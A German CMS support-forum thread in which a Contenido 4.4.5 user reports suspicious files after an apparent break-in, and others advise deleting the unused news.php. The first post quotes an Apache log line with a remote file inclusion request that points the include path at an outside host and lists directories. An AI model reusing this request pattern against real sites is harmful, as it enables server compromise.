Spam versendet / Zugriff auf Server erhalten?

Gesperrt
acquire
Beiträge: 194
Registriert: So 13. Jun 2004, 13:24
Kontaktdaten:

Spam versendet / Zugriff auf Server erhalten?

Beitrag von acquire » Mo 2. Jul 2007, 18:42

Hallo zusammen,

ich verwende Contenido 4.4.5.

Sind die Dateien
von COntenido? Denn sonst hatte ein Hacker Zugriff auf den Server.

Die Dateien waren dem User wwwrun zugeordnet, was darauf hinweist, dass die Dateien über eine Sicherheitslücke imPHP-Scriptgekommen sind.

Apache Logfile-Auszug:
..
website.de***ANGREIFER_IP - - [02/Jul/2007:14:30:24 +0200] "POST /contenido/external/frontend/news.php?cfg%5Bpath%5D%5Bincludes%5D=http%3A%2F%2Flott.by%2Fa%3F&act=ls&d=%2Fwww%2Fhtdocs%2Ftkkg%2Fcontenido%2Fcronjobs&sort=0a HTTP/1.1" 200 40870 "http://website.de/contenido/external/fr ... bs&sort=0a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

Gefunden habe ich nun folgendes Thema:
http://www.contenido.org/forum/viewtopi ... 6719#66719

Kann ich damit die Sicherheitslücke schließen und alles ist gut?

Ich hoffe auf eine schnelle Antwort.

Gruß, acquire

anjaka
Beiträge: 103
Registriert: Di 23. Nov 2004, 11:07
Kontaktdaten:

Beitrag von anjaka » Mo 2. Jul 2007, 23:01

Hi,
die Daten gehören nicht zu contenido 4.4.5.

Hatte die Version vor kurzem auch noch irgendwo laufen und dort waren ähnlich Dateien im conlib-Ordner.

Gruß anjaka

HerrB
Beiträge: 6935
Registriert: Do 22. Mai 2003, 12:44
Wohnort: Berlin
Kontaktdaten:

Beitrag von HerrB » Mo 2. Jul 2007, 23:03

Die news.php wird - wenn kein Newsletter verwendet wird oder die aktuellen Newsletter-Module verwendet werden (siehe Signatur) nicht mehr verwendet und kann bedenkenlos gelöscht werden (sowohl im Mandanten-Verzeichnis, als auch bei contenido/external/frontend).

Gruß
HerrB
Bitte keine unaufgeforderten PMs oder E-Mails -> use da Forum!

Newsletter: V4.4.x | V4.6.0-15 (Module, Backend) | V4.6.22+
Standardartikelliste: V4.4.x | V4.6.x
http://www.contenido.org/forum/search.php | http://faq.contenido.org | http://www.communido.net

acquire
Beiträge: 194
Registriert: So 13. Jun 2004, 13:24
Kontaktdaten:

Beitrag von acquire » Do 26. Jul 2007, 18:17

Danke für die Antworten.

Mittlerweile weiß ich nicht mehr was ich damals am Newsletter geändert habe. War aber - so glaube ich - eine angepasste Version von dir. Vorsichtshalber lasse ich die news.php erstmal drauf.

Gesperrt